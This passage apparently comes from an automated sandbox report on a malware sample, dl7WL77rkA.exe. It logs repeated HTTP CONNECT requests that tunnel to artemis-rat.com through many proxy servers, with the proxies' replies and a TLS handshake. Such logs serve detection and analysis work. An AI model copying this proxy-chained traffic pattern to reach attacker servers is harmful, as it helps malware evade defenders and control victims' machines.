                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.467431068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.295463085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.936095953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.311353922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.244685888 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            78192.168.2.55013445.12.31.140803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.868364096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.022933006 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            79192.168.2.550067159.65.39.23477323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.874836922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.420456886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.372627020 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            80192.168.2.550150104.24.236.203803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.878066063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.032493114 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            81192.168.2.550137199.102.106.9441453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.890568972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            82192.168.2.55000534.140.254.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.892518044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.197731972 CET122INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            server: istio-envoy
                                                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            83192.168.2.55003993.190.142.57418903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.897038937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.191725016 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            84192.168.2.55001147.56.110.20489893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.898274899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.208103895 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.16.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:15:33 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            85192.168.2.55005423.137.248.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.899364948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.192060947 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            86192.168.2.550142162.241.158.204412743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.922277927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.452001095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            87192.168.2.550006185.167.59.215803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.925945044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.282680988 CET60INHTTP/1.0 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: Apache
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.295322895 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c cd 59 17 dd 14 1e 26 9f fe 2d ef 10 83 44 b4 41 15 19 c5 b9 b3 64 45 fe c6 0e a1 09 c6 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: elY&-DAdE*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.672302008 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee 6c ce 8b 22 10 33 9b 17 fd a9 15 38 37 c2 7f d8 b3 db ee b0 ef f1 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                                                                                                                                                                                            Data Ascii: C?el"387DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.672321081 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                                                                                                                                                                                            Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.672383070 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                                                                                                                                                                                            Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.672399044 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                                                                                                                                                                                            Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.676933050 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 fa 8f 1f f6 19 ec 5c 71 76 4c 90 ea 9d 1e ae 93 71 17 39 3c 5d bc 3b 2d 53 fa 09 cf 93 b5 a7 6d 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 5c 52 42 63 93 51 b7 b3 7f f5 1e d5 a8 be 44 be 39 e4 cd c6 d9
                                                                                                                                                                                                                                                            Data Ascii: %! \qvLq9<];-Sm(\RBcQD9;?#ET)
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.032970905 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 ed 3f 73 19 14 7e ba 30 30 a4 f5 a8 44 b2 a7 4a 60 99 f3 bd 38 a9 a9 88 2f 2e 3c 23 cb 00 9f 67 89 ea 48 e3 75 2a ab 25 48 bf b8 25 8b a5 f6 0a d0 21 3b a5 f0 fc 84 f2 95 96 a4 68 3b bb 41 8e 74 2c f5
                                                                                                                                                                                                                                                            Data Ascii: ?s~00DJ`8/.<#gHu*%H%!;h;At,;2@p},;}3Pe@((yby6we0;%%W4x'X&!V-}DeZ^Jk>(_?bcL
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.034902096 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 ca 4f 1d 56 d7 f8 a2 05 91 19 5d 65 e9 08 bf 95 b5 d3 ef 6c e8 03 bf 68 9b c0 e3 65 d0 3f d6 ae 8a 36 cb 58 46 28 88 1d a2 95 ab 50 a1 28 96 d8 af db 0c b5 35 6f 0e f5 03 cd 5d b8 e9 97 3d 97 d2 76 d2 4d 3a
                                                                                                                                                                                                                                                            Data Ascii: OV]elhe?6XF(P(5o]=vM:@%!NjLq]$VIJ8yThCef1bF1XF)\kDX|"c>C[fEpK|>mm>/gJ#U(m~ Lcd}%NO
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.412450075 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 42 67 1c 63 c1 aa 01 51 ae 6b 1e 78 e1 69 9c 6f 40 5c 7e 5d 46 fb 0f a1 17 e9 23 6c e2 28 21 d4 9c 79 f8 e9 09 a9 c2 88 87 1c b7 6f 19 c9 27 f7 2a 5e ac cb ab 8a 49 17 d0 55 c7 51 c4 1a 06 7f f6 c9 46 e5 c5
                                                                                                                                                                                                                                                            Data Ascii: qBgcQkxio@\~]F#l(!yo'*^IUQFC@Z:[skzo.uW/!W+3Fqho0E0!KkM}`SzwZMyLA*7QnQ)[nc{NJA`{WFN&OQ;_
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.412545919 CET1286INData Raw: 7d 96 c7 08 d0 78 94 a6 8b e4 3c 9f 23 34 25 19 0e 80 05 c6 e6 4d e7 0e ce 11 4d af 60 07 bf 6d 55 30 9a 3e 9b dc 64 20 be eb 45 b2 40 24 e7 16 cf dc 5e 0d 88 a7 38 67 e9 6f 17 dc 82 5d e8 b6 18 d9 0d 11 92 dc d9 e6 8a eb 5b 04 74 c8 2a 56 77 d7
                                                                                                                                                                                                                                                            Data Ascii: }x<#4%MM`mU0>d E@$^8go][t*VwQA4Z.}!D8TTClq\VQ.@W{yjdt=k^~<s.z]2F7u-y|3-MUq|@Put3i,s"IOy


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            88192.168.2.55013638.54.95.1990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.929853916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.150342941 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            89192.168.2.55003491.148.127.16280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.934290886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            90192.168.2.55006351.38.63.124272943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.940043926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.592339039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.498665094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.405280113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            91192.168.2.549996203.95.198.14680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.941464901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.302336931 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


